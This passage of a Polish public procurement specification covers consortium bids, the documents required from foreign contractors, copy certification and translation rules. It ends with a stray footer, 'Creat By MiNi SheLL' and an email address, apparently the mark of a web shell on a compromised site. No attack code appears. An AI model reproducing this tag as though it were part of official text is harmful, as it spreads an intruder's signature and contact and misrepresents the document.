Wykonawcy wspólnie ubiegający się o zamówienie publiczne muszą wykazać spełnianie warunków udziału, o których mowa w art. 22 ustawy Pzp. Oświadczenie Wykonawcy  - zał. nr 2 do SIWZ, musi być podpisane przez wszystkich członków konsorcjum, wspólników spółki cywilnej lub osobę wskazaną w pełnomocnictwie. Formularz ofertowy - zał. nr 1 do SIWZ, musi być wypełniony i podpisany przez osobę upoważnioną do reprezentowania Wykonawców/wspólników.

Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Zamawiający proponuje aby w/w umowa zawierała następujące elementy (celem ułatwienia przygotowania umowy):
a-	nazwy i adresy Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b-	określenie celu gospodarczego dla którego umowa została zawarta,
c-	określenie czasu trwania Konsorcjum obejmującego okres realizacji przedmiotu zamówienia, w tym okres obowiązywania rękojmi i gwarancji,
d-	podział zadań pomiędzy poszczególnych Wykonawców należących do Konsorcjum,
e-	określenie lidera Konsorcjum  - może nim być pełnomocnik wskazany w ofercie,
f-	zapis mówiący, że Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za realizację zamówienia, za niewykonanie lub nienależyte wykonanie zamówienia oraz za wniesienie ewentualnego zabezpieczenia należytego wykonania umowy.
Nie dopuszcza się składania umowy przedwstępnej Konsorcjum lub umowy zawartej pod warunkiem zawieszającym.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
zamiast aktualnego odpisu z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości.

Dokument, o którym mowa w pkt. 11 lit. a powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w miejscu zamieszkania osoby, lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 11a zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument taki powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.

Pozostałe dokumenty, o których mowa w rozdziale V pkt. 9 SIWZ Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa w formie i treści w nim określonej. 

12. Dokumenty, o których mowa w Rozdziale V pkt. 9 SIWZ wymienione w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013 roku, w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez  Wykonawcę. Pozostałe dokumenty, o których mowa 
w Rozdziale V pkt 9 SIWZ należy złożyć w formie oryginału.  
12a. W zakresie nieuregulowanym niniejszą Specyfikacją Istotnych Warunków Zamówienia mają zastosowanie przepisy rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form w jakich dokumenty te mogą być składane.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczone za zgodność 
z oryginałem odpowiednio przez wykonawcę lub te podmioty.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com